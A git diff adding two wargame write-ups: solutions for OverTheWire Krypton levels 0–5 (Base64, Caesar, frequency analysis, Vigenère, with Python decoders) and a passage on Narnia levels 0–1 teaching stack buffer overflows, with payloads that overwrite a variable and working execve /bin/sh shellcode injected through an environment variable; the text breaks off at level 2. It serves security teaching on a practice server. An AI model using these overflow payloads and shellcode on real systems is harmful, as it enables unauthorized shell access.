b/CTFs_and_WarGames/WARGAMES/krypton/README.md @@ -0,0 +1,318 @@ +# Cryptography War: Beating Krypton + +The problems are very straightforward and very similar to those from the last [CSAW CTF] ([see my post here]). + + +**Disclaimer**: if you haven't played WarGames, but you are planning to, PLEASE DON'T READ ANY FURTHER. If you don't try to solve the problems by yourself first, you will be wasting your time. + + + + +[Cryptol]: http://www.cryptol.net/ +[Continuing to talk about]: http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html +[Wargames]: http://overthewire.org/wargames/ +[Krypton]: http://overthewire.org/wargames/krypton/ +[CSAW CTF]: https://ctf.isis.poly.edu/ +[see my post here]: http://bt3gl.github.io/csaw-ctf-2014-cryptography-200.html + + +## Level 0: Base64 Transformation + + +This level starts with: + + > The following string encodes the password using Base64: + S1JZUFRPTklTR1JFQVQ= + > Use this password to log in to krypton.labs.overthewire.org with username krypton1 using SSH. You can the files for other levels in /krypton/. + + +[Base64] is just a way to represent binary data in ASCII, by translating it into a radix-64. Linux provides a built-in Base64 encoder/decoder tool, so all we need to do is: + +``` +$ base64 -d KRYPTON0.txt + +``` + + +[Base64]: http://en.wikipedia.org/wiki/Base64 + +---- + +## Level 1: Classic Caesar Cypher + +The second level starts with: + + > The password for level 2 is in the file ‘krypton2’. It is ‘encrypted’ using a simple rotation. It is also in non-standard ciphertext format. When using alpha characters for ciphertext it is normal to group the letters into five letter clusters, regardless of word boundaries. This helps obfuscate any patterns. This file has kept the plain text word boundaries and carried them to the ciphertext. Enjoy! + + +This is the classic [Caesar Cypher] (they really love this thing :). + + In Caesar’s cipher, the letters in the plaintext are shifted by a fixed number of elements down the alphabet. For example, if the shift is 3, A becomes D , B becomes E , and so on. Once we run out of letters, we circle back to A. + +We can solve this challenge in a few lines using Linux's built-in [tr] (translate tool): + +``` +krypton1@melinda:/krypton/krypton1$ VAR=$(cat krypton2) +krypton1@melinda:/krypton/krypton1$ echo $VAR +YRIRY GJB CNFFJBEQ EBGGRA +krypton1@melinda:/krypton/krypton1$ alias rot13="tr A-Za-z N-ZA-Mn-za-m" +krypton1@melinda:/krypton/krypton1$ echo "$VAR" | rot13 +``` + +[Caesar Cypher]: http://en.wikipedia.org/wiki/Caesar_cipher +[tr]: http://linux.die.net/man/1/tr + + +----- + +## Level 2 + +The third level starts with: + + > ROT13 is a simple substitution cipher. + + > Substitution ciphers are a simple replacement algorithm. In this example of a substitution cipher, we will explore a 'monoalphabetic' cipher. Monoalphebetic means, literally, "one alphabet" and you will see why. + + > This level contains an old form of cipher called a 'Caesar Cipher'. + > A Caesar cipher shifts the alphabet by a set number. For example: + + > plain: a b c d e f g h i j k ... + > cipher: G H I J K L M N O P Q ... + + > In this example, the letter 'a' in plaintext is replaced by a 'G' in the ciphertext so, for example, the plaintext 'bad' becomes 'HGJ' in ciphertext. + + > The password for level 3 is in the file krypton3. It is in 5 letter group ciphertext. It is encrypted with a Caesar Cipher. Without any further information, this ciphertext may be challenging to break. You do not have direct access to the key, however, you do have access to a program that will encrypt anything you wish to give it using the key. If you think logically, this is completely easy. + + +First, we make a file filled with the alphabet, so we can test the binary: + +```sh +$ ln -s /krypton/krypton2/keyfile.dat keyfile.dat +$ echo {A..Z} {a..z} > file +$ cat file +A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z +``` + +Running the binary: +``` +$ /krypton/krypton2/encrypt file +$ cat ciphertext +MNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKL +``` + +We see a ROT14 (since ROT13 starts in N). + +As a second way to find the rotation, we could use [ltrace]: +``` +$ ltrace /krypton/krypton2/encrypt file | less +``` + +Which shows things such as: + +``` +fgetc(0x602250) = 'A' +toupper('A') = 'A' +isalpha(65, 65, 0x7ffff7dd0d00, -1, 0xffffffff) = 1024 +fputc('M', 0x602490) = 77 +``` + + +Now that we know the rotation number, we can decrypt the password in the same way as we did in the previous level: + +```sh +krypton2@melinda:/tmp$ alias rot14="tr A-Z O-ZA-N" +krypton2@melinda:/tmp$ echo "$VAR" | rot14 + +``` + + +[ltrace]: http://linux.die.net/man/1/ltrace + +--- + +## Level 3: Frequency Analysis + +This level starts with: + + > Well done. You've moved past an easy substitution cipher. + + > Hopefully you just encrypted the alphabet a plaintext to fully expose the key in one swoop. + + > The main weakness of a simple substitution cipher is repeated use of a simple key. In the previous exercise, you were able to introduce arbitrary plaintext to expose the key. In this example, the cipher mechanism is not available to you, the attacker. + + > However, you have been lucky. You have intercepted more than one message. The password to the next level is found in the file 'krypton4'. You have also found three other files. (found1, found2, found3) + + +This time we have to use [frequency analysis] to count the number of times each letter appears in our message. The results are compared to the frequency in each we see letters in English. This is enough to break this type of cipher. + +For this purpose, I wrote the following script: + + +```python +import string +import sys +import operator + +FREQ_ENGLISH = [0.0749, 0.0129, 0.0354, 0.0362, 0.1400, 0.0218, 0.0174, 0.0422, 0.0665, 0.0027, 0.0047, 0.0357,0.0339, 0.0674, 0.0737, 0.0243, 0.0026, 0.0614, 0.0695, 0.0985, 0.0300, 0.0116, 0.0169, 0.0028, 0.0164, 0.0004] + +def find_frequency(msg): + dict_freq = dict([(c, 0) for c in string.lowercase]) + total_letters = 0.0 + for c in msg.lower(): + if 'a'<= c <= 'z': + dict_freq[c] += 1 + total_letters += 1 + list_freq = sorted(dict_freq.items(), key=operator.itemgetter(1)) + return [(c, freq/total_letters) for (c, freq) in list_freq] + +def main(filename): + with open(filename, 'r') as f: + cipher = f.readlines() + cipher = cipher[0].strip() + flist = find_frequency(cipher) + elist = dict((k, value) for (k, value) in zip(string.lowercase, FREQ_ENGLISH)) + elist = sorted(elist.items(), key=operator.itemgetter(1)) + trans, key = '', '' + for i, f in enumerate(flist):ls + trans += f[0] + key += elist[i][0] + print "CIPHER: %s -> %.5f, ENGLISH: %s -> %.5f" %(f[0], f[1], elist[i][0], elist[i][1]) + print "Key is " + key + " for " + trans + + # print key sorted to translate to a-z + res = zip(trans, key) + res.sort() + trans, key = '', '' + for letter in res: + trans += letter[1].upper() + key += letter[0].upper() + print "tr [" + key + "] [" + trans + "]" + +if __name__ == "__main__": + main(str(sys.argv[1])) +``` + + +Running it gives us the key: + +``` +$ cat /krypton/krypton3/found1 > cipher +$ cat /krypton/krypton3/found2 >> cipher +$ cat /krypton/krypton3/found3 >> cipher +$ /krypton/krypton3$ python freq.py cipher +$ alias rotvi='tr ABCDEFGHIJKLMNOPQRSTUVWXYZ BOIHPKNQVTWGURXZAJEYSLDFPU' +$ cat /krypton/krypton3/krypton4 | rotvi +``` + +We could also use [this online tool] to find the frequencies. + +[this online tool]: http://www.richkni.co.uk/php/crypta/freq.php + +[frequency analysis]: http://en.wikipedia.org/wiki/Frequency_analysis + +---- + +## Level 4: Vigenere Cipher I + +The fifth level starts with: + + > So far we have worked with simple substitution ciphers. They have also been ‘monoalphabetic’, meaning using a fixed key, and giving a one to one mapping of plaintext (P) to ciphertext (C). Another type of substitution cipher is referred to as ‘polyalphabetic’, where one character of P may map to many, or all, possible ciphertext characters. + + > An example of a polyalphabetic cipher is called a Vigenère Cipher. It works like this: + + > If we use the key(K) ‘GOLD’, and P = PROCEED MEETING AS AGREED, then “add” P to K, we get C. When adding, if we exceed 25, then we roll to 0 (modulo 26). + + > P P R O C E E D M E E T I N G A S A G R E E D\ + > K G O L D G O L D G O L D G O L D G O L D G O\ + > becomes: + + > P 15 17 14 2 4 4 3 12 4 4 19 8 13 6 0 18 0 6 17 4 4 3\ + > K 6 14 11 3 6 14 11 3 6 14 11 3 6 14 11 3 6 14 11 3 6 14\ + > C 21 5 25 5 10 18 14 15 10 18 4 11 19 20 11 21 6 20 2 8 10 17\ + > So, we get a ciphertext of: + + > VFZFK SOPKS ELTUL VGUCH KR + > This level is a Vigenère Cipher. You have intercepted two longer, english language messages. You also have a key piece of information. You know the key length! + +This is a classic case of [Vigenere cipher], which is a variation on Caesar’s cipher. In this case, one uses multiple shift amounts according to a keyword. + +To solve this, we use the [pygenere] library in Python. First, we need to find the key: + +```pyhton +import sys +from pygenere import Vigenere, VigCrack + +def get_key(msg): + # Vigenere Cypher + key = VigCrack(msg).crack_codeword() + dec_msg = VigCrack(msg).crack_message() + dec_msg = dec_msg.replace(" ", "") + return key, dec_msg + +if __name__ == '__main__': + # getting the key + with open('cipher', 'r') as f: + msg = f.readlines() + msg_in = msg[0].strip() + key, answer = get_key(msg_in) + print 'Message: ' + msg_in + print + print 'Answer: ' + answer + print '(key: ' + key + ')' +``` + +The deciphered text is: + > THESOLDIERWITHTHEGREENWHISKERSLEDTHEMTHROUGHTHESTREETSOFTHEEMERALDCITYUNTILTHEYREACHED +THEROOMWHERETHEGUARDIANOFTHEGATESLIVEDTHISOFFICERUNLOCKEDTHEIRSPECTACLESTOPUTTHEMBACK +INHISGREATBOXANDTHENHEPOLITELYOPENEDTHEGATEFOROURFRIENDSWHICHROADLEADSTOTHEWICKEDWITCHOF +THEWESTASKEDDOROTHYTHEREISNOROADANSWEREDTHEGUARDIANOFTHEGATESNOONEEVERWISHESTOGOTHATWAY +HOWTHENAREWETOFINDHERINQUIREDTHEGIRLTHATWILLBEEASYREPLIEDTHEMANFORWHENSHEKNOWSYOUAREIN +THECOUNTRYOFTHEWINKIESSHEWILLFINDYOUANDMAKEYOUALLHERSLAVESPERHAPSNOTSAIDTHESCARECROWFOR +WEMEANTODESTROYHEROHTHATISDIFFERENTSAIDTHEGUARDIANOFTHEGATESNOONEHASEVERDESTROYEDHER +BEFORESOINATURALLYTHOUGHTSHEWOULDMAKESLAVESOFYOUASSHEHASOFTHERESTBUTTAKECAREFORSHEIS +WICKEDANDFIERCEANDMAYNOTALLOWYOUTODESTROYHERKEEPTOTHEWESTWHERETHESUNSETSANDYOUCANNOT +FAILTOFINDHERTHEYTHANKEDHIMANDBADEHIMGOODBYEANDTURNEDTOWARDTHEWESTWALKINGOVERFIELDS +OFSOFTGRASSDOTTEDHEREANDTHEREWITHDAISIESANDBUTTERCUPSDOROTHYSTILLWORETHEPRETTYSILKDRESS +SHEHADPUTONINTHEPALACEBUTNOWTOHERSURPRISESHEFOUNDITWASNOLONGERGREENBUTPUREWHITETHERIB +BONAROUNDTOTOSNECKHADALSOLOSTITSGREENCOLORANDWASASWHITEASDOROTHYSDRESSTHEEMERALDCITYW +ASSOONLEFTFARBEHINDASTHEYADVANCEDTHEGROUNDBECAMEROUGHERANDHILLIERFORTHEREWERENOFARMSN +ORHOUSESINTHISCOUNTRYOFTHEWESTANDTHEGROUNDWASUNTILLEDINTHEAFTERNOONTHESUNSHONEHOTINTHEI +RFACESFORTHEREWERENOTREESTOOFFERTHEMSHADESOTHATBEFORENIGHTDOROTHYANDTOTOANDTHELIONWER +ETIREDANDLAYDOWNUPONTHEGRASSANDFELLASLEEPWITHTHEWOODMANANDTHESCARECROWKEEPINGWATCH + + +Finally, we use the key to decipher the password: + +```python +def solve(msg, key): + dec_msg = Vigenere(msg).decipher(key) + dec_msg = dec_msg.replace(" ", "") + return dec_msg + +if __name__ == '__main__': + # deciphering + key = 'FREKEY' + with open('pass', 'r') as f: + msg = f.readlines() + answer = solve(msg[0].strip(), key) + print "The answer is: " + answer +``` + +[Vigenere cipher]: http://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher +[pygenere]: http://smurfoncrack.com/pygenere/pygenere.py + + + + +---- + +## Level 5: Vigenere Cipher II + +The sixth level starts with: + + + > Frequency analysis can break a known key length as well. Let's try one last polyalphabetic cipher, but this time the key length is unknown. + +This is another example of Vigenere Cipher. Using the same method as before, we first get the key and then the password. + + diff --git a/CTFs_and_WarGames/WARGAMES/narnia/README.md b/CTFs_and_WarGames/WARGAMES/narnia/README.md new file mode 100644 index 0000000..5c447e1 --- /dev/null +++ b/CTFs_and_WarGames/WARGAMES/narnia/README.md @@ -0,0 +1,1057 @@ +# Smashing the Stack for Fun or WarGames - Narnia 0-4 + + +One of my mentors, **Joel Eriksson**, suggested the quintessential **[WarGames]**, a collection of **Security problems**, divided into 14 interesting titles. I have been playing the games since last week, and they are awesome! To play the WarGames you SSH to their servers with a login that indicates your current level. The purpose of the game is to solve the current level's challenge to find the password for the next level. + +Today I am talking about the first five levels of **[Narnia]**, which is all about **[buffer overflow]** and **[inputs with no bounds checking]**. + + +You will see that this war is not so bad when you know your weapons. + + +**Disclaimer**: if you haven't played WarGames, but you are planning to, PLEASE DON'T READY ANY FURTHER. If you don't try to solve the problems by yourself first, you will be wasting your time. + +[inputs with no bounds checking]: http://en.wikipedia.org/wiki/Bounds_checking +[buffer overflow]: http://en.wikipedia.org/wiki/Buffer_overflow +[process's virtual memory]: http://en.wikipedia.org/wiki/Virtual_memory + +-------- + +## How Stack Exploitation Works: A Crash Course + +### A Process' Virtual Memory + +When a program starts a process, the OS kernel provides it a piece of [physical memory]. However, all that the process sees is the [virtual memory space] and its size and starting address. Each time a process wants to read or write to physical memory, its request must be translated from a virtual memory address to a physical memory address. + + +[physical memory]: http://en.wikipedia.org/wiki/Computer_memory +[virtual memory space]: http://en.wikipedia.org/wiki/Virtual_memory + + +I like [Peter Jay Salzman]'s picture showing the process' virtual memory in terms of its address. + +![cyber](http://i.imgur.com/RYEpFEA.png) + + +The *text* and *data* segments are the places where the program puts the code and the static data (*e.g*., global variables). This region is normally marked read-only, and any attempt to write to it will result in a [segmentation violation]. + +Notice that arguments and environment variables get a special place in the top of the Stack (higher address). + +Although the [Heap] can also be fun to play with, for the purpose of these games, we will concentrate on the **Stack**. Remember, the [direction of which the Stack grows] is system-dependent. + + + +[direction of which the Stack grows]: https://stackoverflow.com/questions/664744/what-is-the-direction-of-stack-growth-in-most-modern-systems +[segmentation violation]: http://en.wikipedia.org/wiki/Segmentation_fault +[Heap]: http://en.wikipedia.org/wiki/Heap_(data_structure) + + +### What's the Stack + + +A Stack is an *abstract data type* that has the property that the last object placed will be the first object removed. This is also known as *last-in/first-out queue* or *LIFO*. Two of the most essential operations in a Stack are *push* and *pop*. + +You can think of a stack of books: the only way to reach the book in the bottom (the first book that was pushed) is by popping every book on the top. To learn how to write a Stack in Python, take a look at my notes on [Python & Algorithms]. I also made the source code available: [here are some examples]. + +The memory Stack frame is a collection of (stack) frames. Every time a process calls a function, it alters the flow of control. In this case, a new frame needs to be added, and the Stack grows downward (lower memory address). + +If you think about it, a Stack is a perfect object for a process: the process can push a function (its arguments, code, etc.) into the Stack, then, in the end, it pops everything, back to where it started. + + + + +[Python & Algorithms]: https://github.com/bt3gl/Python-and-Algorithms-and-Data-Structures/blob/master/book/book_second_edition.pdf +[here are some examples]: https://github.com/bt3gl/Python-and-Algorithms-and-Data-Structures/tree/master/src/abstract_structures/Stacks + + + + +### Buffer Overflows in the Stack + +Buffer overflows happen when we give a buffer more information than it is meant to hold. For example, the **standard C library** has several functions for copying or appending strings with no bounds checking: ```strcat()```, ```strcpy()```, ```sprintf()```, ```vsprintf()```, ```gets()```, and ```scanf()```. These functions can easily overflow a buffer if the input is not validated first. + +To better understand this subject, I recommend the classic [Smashing the Stack for Fun or Profit] from [Aleph One], which was published in 1996 in the [Phrack magazine] number 49. + +[WarGames]: http://overthewire.org/wargames +[Narnia]: http://overthewire.org/wargames/narnia +[Aleph One]: http://en.wikipedia.org/wiki/Elias_Levy +[Phrack magazine]: http://www.phrack.org/ +[Smashing the Stack for Fun or Profit]: http://insecure.org/stf/smashStack.html +[Peter Jay Salzman]: http://www.dirac.org/linux/gdb/ + + + + +### Assembly and the Stack Registers + +Registers are small memory storage areas built into the CPU. When the process enters the Stack, a register called the **Stack pointer** (esp) points to the top of the Stack (lowest memory address). The bottom of the Stack (higher memory address) is at a fixed address (adjusted by the kernel at run time). The CPU will implement instructions to push onto and pop stuff of the Stack. + +In Assembly code this looks like: + +``` +pushl %ebp +movl %esp,%ebp +subl $20,%esp +``` + +The two first lines are the prologue. In the first line of this code, the (old) **frame pointer** (ebp) is pushed onto the top of the Stack (lowest memory). Then, the current **esp** is copied into the **stack frame base pointer** (ebp), making it the new frame pointer. In the last line, space is allocated for the local variables, subtracting their size from esp (remember that memory can only be addressed in multiples of the word size, for example, 4 bytes, or 32 bits). + + + +After this point, the Assembly code will show each operation step in the program. We will learn more about this during the challenges. It's a good skill to understand the basics of Assembly, but this is outside the context of this review. Check out this [nice Assembly guide] if you need to. Also, [this cheat sheet] is awesome. + +[this cheat sheet]: http://darkdust.net/files/GDB%20Cheat%20Sheet.pdf + +[nice Assembly guide]: http://www.drpaulcarter.com/pcasm/ + +Ah, by the way, you can look to the Assembly output in a C program by using the flag ```-S```: + +```sh +$ gcc -S -o example1.s example1.c +``` + + + +---- + +## Narnia's WarGame + +### The Scenario + +In each of Narnia's levels, we are able to [run a binary and read its C code]. The objective is to figure out from the code what vulnerability can be used to allow us to read the password of the next level (located in a folder under ```/etc``` in the server). + + +[run a binary and read its C code]: http://www.thegeekstuff.com/2011/10/c-program-to-an-executable/ + + + + +### Your Weapons + + + + + +#### Memory and Exploits Representation + + +When it comes to memory addresses, it's fundamental to understand [hexadecimal representation]. You can print a HEX into [ASCII] with Python: +```python +$ python -c 'print "\x41"' +A +``` + +Remember that Narnia's servers are [x86], so they have [little-endian] representation. This means that an address ```0xffffd546 ``` is actually written as ```\x46\xd5\xff\xff ```. + +Most of the exploit we deliver in Narnia is in the form of input strings. Python with the flag, ```-c```, is really handy to craft what we need: +```sh +$ python -c 'print "A"*20' +AAAAAAAAAAAAAAAAAAAA +``` + +[little-endian]: http://en.wikipedia.org/wiki/Endianness +[x86]: http://en.wikipedia.org/wiki/X86 +[ASCII]: http://en.wikipedia.org/wiki/ASCII +[hexadecimal representation]: http://en.wikipedia.org/wiki/Hexadecimal + + +#### Environment Variables + +If you look to the picture above, you see that the system environment variables are available within the Stack. This can be useful to some exploits, where we can use these variables to import payloads. + +To define an environment variable, we use ```export```. To print its value, you can use ```echo``` or ```env```: +```sh +$ EGG="0X41414141" +$ echo $EGG +0X41414141 +$ export EGG +$ env | grep EGG +EGG=0X41414141 +``` + +To understand more about environments variables in exploits, take a look into my [Shellshock guide]. + +[Shellshock guide]: http://bt3gl.github.io/understanding-the-shellshock-vulnerability.html + + +#### Shell Commands + +The shell commands that are useful for these problems are: + + +* ```readelf```: Displays information about ELF files (the binaries). For example, a detail that will be important soon is the fact that, in Narnia, the *Stack is executable*. This means that we can place shellcode within it. To check whether the Stack is executable see if the following output has the flag **E**: +```sh +narnia1@melinda:/narnia$ readelf -a narnia1 | grep GNU_STACK + GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4 +``` + + +* ```xxd```: Creates a hex dump of a given file or standard input. It can also convert a hex dump back to its original binary form. + +* ```whoami```: Shows the current user, good to see whether the exploit worked! + + + +### gdb and objdump + +In most of the problems in Narnia, it's fundamental do understand how to debug the binary with **gdb**. + + +[very introductory guide]: http://www.thegeekstuff.com/2010/03/debug-c-program-using-gdb/ +[comprehensive guide]: http://www.dirac.org/linux/gdb/ + + +To learn more about gdb, you might want to check this [very introductory guide] or this [comprehensive guide]. However, in any problem in Narnia these steps are enough: + +* To start a gdb instance: ```gdb -q ```. +* To get the Assembly code we use the ```disassemble``` command. Constants are prefixed with a $ and registers with a %: +``` +(gdb) set disassembly-flavor intel +(gdb) disas main +``` + + + +* To set breakpoints to the address to inspect, based on the values from the output above: +``` +(gdb) b *main+ +``` + +* To run the program: ```(gdb) r```. We also can use ```c``` to continue to run it after the breakpoint. We can use ```n``` for the next program line. We can print things using ```p```. + +* To examine some memory address, we can use ```(gdb) x/nfu A```, where **A** is the address (*e.g.*, ```$esp``), n is the number of units to print, f is the format character, and u is the unit. + +* To examine the Stack frame: ```(gdb) i f```. We can also look at the Stack by using ```bt``` (backtrace). + + + +* When you start using gdb frequently, it's useful to have a file with starting commands. For example: + +```sh +$ gdb -x +``` + +Where: +```sh +$ cat command.txt +set disassembly-flavor intel +disas main +``` + +Or you can have a nice **.gdbinit** setup with lines such as: +``` +set disassembly-flavor intel +set follow-fork-mode child +``` + + + +As a note, there are other **disassembles** that you might want to try instead of gdb: + +* The shell command **objdump -d**, which display the Assembly information from object files. +* IDA Pro. +* BinNavi. +* Hopper Disassembler. +* readelf. + + + + +-------------- + +## Level 0: Classic Stack Overflow to rewrite a Variable + + +### Step 1: Understanding the Problem + +The first level starts with: + +```sh +narnia0@melinda:/narnia$ cat narnia0.c + +#include +#include + +int main(){ + long val=0x41414141; + char buf[20]; + + printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); + printf("Here is your chance: "); + scanf("%24s",&buf); + + printf("buf: %s\n",buf); + printf("val: 0x%08x\n",val); + + if(val==0xdeadbeef) + system("/bin/sh"); + else { + printf("WAY OFF!!!!\n"); + exit(1); + } + + return 0; +} +``` + +The program receives an input from the user and saves it in a buffer variable of size 20. Then, it checks if the *val* is equal to a different value of what it was declared: +```c +if(val==0xdeadbeef) + system("/bin/sh"); +``` +Since *val* obviously didn't change anywhere in the program, nothing happens, and the program exits normally. + +However, if somehow we could change the value of *val* to [0xdeadbeef], the program will give us a privileged shell! + + +[0xdeadbeef]: http://en.wikipedia.org/wiki/Hexspeak + +Let's think about the memory Stack. Just like in a pile of books, the local variables are pushed in the order that they are created. In the case above, *val* is pushed before *buf*, so *val* is in a higher memory address: +```c + long val=0x41414141; + char buf[20]; +``` + +What happens if the input is larger than 20 bytes? In this case, there are no bounds checking, and the input overflows the variable *buf*, occupying the following space in the Stack: *val*. This is a classic case of **Stack Overflow**! + + + +### Step 2: Visualizing the Overflow + + +The plan is to overflow *buf* with 20+4 bytes so that the last four bytes overwrites *val* with ```0xdeadbeef```. + +Let's see how *val* is filled when we overflow byte by byte: + + +```sh +narnia0@melinda:/narnia$ python -c 'print "B"*24' +BBBBBBBBBBBBBBBBBBBBBBBB + +narnia0@melinda:/narnia$ (python -c 'print "B"*19') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBB +val: 0x41414141 +WAY OFF!!!! + + +narnia0@melinda:/narnia$ (python -c 'print "B"*20') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBBB +val: 0x41414100 +WAY OFF!!!! + +narnia0@melinda:/narnia$ (python -c 'print "B"*21') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBBBB +val: 0x41410042 +WAY OFF!!!! + +narnia0@melinda:/narnia$ (python -c 'print "B"*22') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBBBBB +val: 0x41004242 +WAY OFF!!!! + +narnia0@melinda:/narnia$ (python -c 'print "B"*23') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBBBBBB +val: 0x00424242 +WAY OFF!!!! + +narnia0@melinda:/narnia$ (python -c 'print "B"*24') | ./narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: BBBBBBBBBBBBBBBBBBBBBBBB +val: 0x42424242 +WAY OFF!!!! +``` + +### Step 3: Crafting the Exploit + +Now we know that `val` starts to overflow in the 20th byte. All we need to do is to add ```deadbeef``` in the last four bytes. + +However, we need to write this in hexadecimal form: + +```sh +narnia0@melinda:/narnia$ python -c'print "A"*20 + "\xef\xbe\xad\xde"' +AAAAAAAAAAAAAAAAAAAAᆳ +narnia0@melinda:/narnia$ (python -c'print "A"*20 + "\xef\xbe\xad\xde"') | ./narnia0 Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ +val: 0xdeadbeef +``` + +Yay, the exploit worked! + + +### Step 4: Getting Access to the Shell + + +We were able to get access to our shell, but it closed too fast when the program execution ended. + +We need to create a way to read the password before we lose the control to the shell. A good way is pipelining some command that waits for input, such as ```tail``` or ```cat```. + +It turns out that only ```cat``` actually prints the output: + +```sh +narnia0@melinda:/narnia$ (python -c'print "A"*20 + "\xef\xbe\xad\xde"'; cat) | /narnia/narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ +val: 0xdeadbeef +cat /etc/narnia_pass/narnia1 +``` +Done! We have completed the 0th level! + + +### Step 5: Debugging it! +Although this problem was easy enough so we didn't need to debug anything, it's a good call to understand the process while the challenge is easy: + +```sh +narnia0@melinda:/narnia$ gdb ./narnia0 +(gdb) set disassembly-flavor intel +(gdb) disas main +Dump of assembler code for function main: + 0x080484c4 <+0>: push ebp + 0x080484c5 <+1>: mov ebp,esp + 0x080484c7 <+3>: and esp,0xfffffff0 + 0x080484ca <+6>: sub esp,0x30 + 0x080484cd <+9>: mov DWORD PTR [esp+0x2c],0x41414141 + 0x080484d5 <+17>: mov DWORD PTR [esp],0x8048640 + 0x080484dc <+24>: call 0x80483b0 + 0x080484e1 <+29>: mov eax,0x8048673 + 0x080484e6 <+34>: mov DWORD PTR [esp],eax + 0x080484e9 <+37>: call 0x80483a0 + 0x080484ee <+42>: mov eax,0x8048689 + 0x080484f3 <+47>: lea edx,[esp+0x18] + 0x080484f7 <+51>: mov DWORD PTR [esp+0x4],edx + 0x080484fb <+55>: mov DWORD PTR [esp],eax + 0x080484fe <+58>: call 0x8048400 <__isoc99_scanf@plt> + 0x08048503 <+63>: mov eax,0x804868e + 0x08048508 <+68>: lea edx,[esp+0x18] + 0x0804850c <+72>: mov DWORD PTR [esp+0x4],edx +(...) +End of assembler dump. +``` +Let's put a break point right after ```scanf```: + +```sh +(gdb) b *main+63 +Breakpoint 1 at 0x8048503 +``` + +We run the debugged program with 20 Bs (\x42) as the input. It stops in the address above, right after ```scanf```: +```sh +(gdb) r +Starting program: /games/narnia/narnia0 +Correct val's value from 0x41414141 -> 0xdeadbeef! +Here is your chance: + +Breakpoint 1, 0x08048503 in main () +``` + +Now we examine the memory in, say, 12 counts: + +```sh +(gdb) x/12xw $esp +0xffffd6a0: 0x08048689 0xffffd6b8 0x08049ff4 0x08048591 +0xffffd6b0: 0xffffffff 0xf7e59d46 0x42424242 0x42424242 +0xffffd6c0: 0x42424242 0x42424242 0x42424242 0x41414100 +``` + +The variable *buf* is in the 7-11th entries (0x42424242). Right after that is *val* (which we know is still 0x41414141). Wait, do you see the two zeros in ```0x41414100```? This is the space at the end of *buf* + +Finally, we test with 20 Bs + 4 Cs and confirm that our exploit works: + +```sh +(gdb) x/12xw $esp +0xffffd6a0: 0x08048689 0xffffd6b8 0x08049ff4 0x08048591 +0xffffd6b0: 0xffffffff 0xf7e59d46 0x42424242 0x42424242 +0xffffd6c0: 0x42424242 0x42424242 0x42424242 0x43434343 +``` + + +--- + +## Level 1: Stack Overflow with Environment Variables + +### Step 1: Understanding the Problem + +The second level starts with: +```c +narnia1@melinda:/narnia$ ./narnia1 +Give me something to execute at the env-variable EGG + +narnia1@melinda:/narnia$ cat narnia1.c +#include + +int main(){ + int (*ret)(); + + if(getenv("EGG")==NULL){ + printf("Give me something to execute at the env-variable EGG\n"); + exit(1); + } + + printf("Trying to execute EGG!\n"); + ret = getenv("EGG"); + ret(); + + return 0; +} +``` + +The program searches for an environment variable **EGG** and then it exits if this variable doesn't exist. If it does, **EGG**'s value is passed as a function. Really secure. + + + +### Step 1: Creating an Environment Variable with our Exploit + +The most obvious option for an exploit is to spawn a privileged shell, so that we can read the next level's password. + +Let's suppose we don't know that we need to write the exploit in memory language. We could try this: +```sh +narnia1@melinda:/narnia$ export EGG="/bin/ls" +narnia1@melinda:/narnia$ echo $EGG +/bin/ls +narnia1@melinda:/narnia$ ./narnia1 +Trying to execute EGG! +Segmentation fault +``` + +Nope. + +We actually need to create a hexadecimal command to export to **EGG**. We do this in Assembly and all the information we need is in the [Appendix A] from [Aleph One]'s paper. This allows us to write the following: + +[Appendix A]: http://insecure.org/stf/smashStack.html + + + +```sh +narnia1@melinda:/tmp$ vi shellspawn.asm +xor eax, eax ; make eax equal to 0 +push eax ; pushes null +push 0x68732f2f ; pushes /sh (//) +push 0x6e69622f ; pushes /bin +mov ebx, esp ; passes the first argument +push eax ; empty third argument +mov edx, esp ; passes the third argument +push eax ; empty second argument +mov ecx, esp ; passes the second argument +mov al, 11 ; execve system call #11 +int 0x80 ; makes an interrupt +``` + +Compiling: + +```sh +narnia1@melinda:/tmp$ nasm shellspawn.asm +narnia1@melinda:/tmp$ ls +shellspawn shellspawn.asm +narnia1@melinda:/tmp$ cat shellspawn +1�Ph//shh/bin��P��P��� +``` + +Exporting it to *EGG*: + +```sh +narnia1@melinda:/tmp$ export EGG=$(cat shellspawn) +``` +We are ready to exploit the binary: + +```sh +narnia1@melinda:/tmp$ /narnia/narnia1 +Trying to execute EGG! +$ whoami +narnia2 +``` + + + +### Step 4: Convert it to Hexadecimal + +It's really useful to have a hexadecimal form of our exploit (as we will see in the next levels) so we will use ```xxd``` to read it: + +```sh +narnia5@melinda:/tmp$ xxd shellspawn +0000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P +0000010: 89e2 5089 e1b0 0bcd 80 ..P...... +``` + +Awesome! We can go ahead and test it: +```sh +narnia1@melinda:/tmp$ export EGG=`python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80"'` +narnia1@melinda:/tmp$ /narnia/narnia1 +Trying to execute EGG! +$ whoami +narnia2 +``` + + +---------- + + +## Level 2: Stack Overflow to the Return Address + +### Step 1: Understanding the Problem: + +The third level starts with: 